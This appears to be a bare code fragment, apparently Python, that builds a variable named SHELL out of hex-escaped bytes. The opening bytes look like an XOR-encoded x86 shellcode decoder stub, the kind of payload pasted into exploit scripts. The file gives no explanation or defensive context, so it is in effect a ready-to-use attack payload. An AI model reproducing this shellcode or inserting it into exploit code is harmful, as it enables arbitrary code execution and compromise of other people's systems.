SHELL =  b""
SHELL += b"\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e"
SHELL += b"\x81\x76\x0e\x88\xb9\x85\x9a\x83\xee\xfc\xe2\xf4"
SHELL += b"\x74\x51\x07\x9a\x88\xb9\xe5\x13\x6d\x88\x45\xfe"
SHELL += b"\x03\xe9\xb5\x11\xda\xb5\x0e\xc8\x9c\x32\xf7\xb2"
SHELL += b"\x87\x0e\xcf\xbc\xb9\x46\x29\xa6\xe9\xc5\x87\xb6"
SHELL += b"\xa8\x78\x4a\x97\x89\x7e\x67\x68\xda\xee\x0e\xc8"
SHELL += b"\x98\x32\xcf\xa6\x03\xf5\x94\xe2\x6b\xf1\x84\x4b"
SHELL += b"\xd9\x32\xdc\xba\x89\x6a\x0e\xd3\x90\x5a\xbf\xd3"
SHELL += b"\x03\x8d\x0e\x9b\x5e\x88\x7a\x36\x49\x76\x88\x9b"
SHELL += b"\x4f\x81\x65\xef\x7e\xba\xf8\x62\xb3\xc4\xa1\xef"
SHELL += b"\x6c\xe1\x0e\xc2\xac\xb8\x56\xfc\x03\xb5\xce\x11"
SHELL += b"\xd0\xa5\x84\x49\x03\xbd\x0e\x9b\x58\x30\xc1\xbe"
SHELL += b"\xac\xe2\xde\xfb\xd1\xe3\xd4\x65\x68\xe6\xda\xc0"
SHELL += b"\x03\xab\x6e\x17\xd5\xd1\xb6\xa8\x88\xb9\xed\xed"
SHELL += b"\xfb\x8b\xda\xce\xe0\xf5\xf2\xbc\x8f\x46\x50\x22"
SHELL += b"\x18\xb8\x85\x9a\xa1\x7d\xd1\xca\xe0\x90\x05\xf1"
SHELL += b"\x88\x46\x50\xf0\x80\xe0\xd5\x78\x75\xf9\xd5\xda"
SHELL += b"\xd8\xd1\x6f\x95\x57\x59\x7a\x4f\x1f\xd1\x87\x9a"
SHELL += b"\x99\xe5\x0c\x7c\xe2\xa9\xd3\xcd\xe0\x7b\x5e\xad"
SHELL += b"\xef\x46\x50\xcd\xe0\x0e\x6c\xa2\x77\x46\x50\xcd"
SHELL += b"\xe0\xcd\x69\xa1\x69\x46\x50\xcd\x1f\xd1\xf0\xf4"
SHELL += b"\xc5\xd8\x7a\x4f\xe0\xda\xe8\xfe\x88\x30\x66\xcd"
SHELL += b"\xdf\xee\xb4\x6c\xe2\xab\xdc\xcc\x6a\x44\xe3\x5d"
SHELL += b"\xcc\x9d\xb9\x9b\x89\x34\xc1\xbe\x98\x7f\x85\xde"
SHELL += b"\xdc\xe9\xd3\xcc\xde\xff\xd3\xd4\xde\xef\xd6\xcc"
SHELL += b"\xe0\xc0\x49\xa5\x0e\x46\x50\x13\x68\xf7\xd3\xdc"
SHELL += b"\x77\x89\xed\x92\x0f\xa4\xe5\x65\x5d\x02\x65\x87"
SHELL += b"\xa2\xb3\xed\x3c\x1d\x04\x18\x65\x5d\x85\x83\xe6"
SHELL += b"\x82\x39\x7e\x7a\xfd\xbc\x3e\xdd\x9b\xcb\xea\xf0"
SHELL += b"\x88\xea\x7a\x4f"
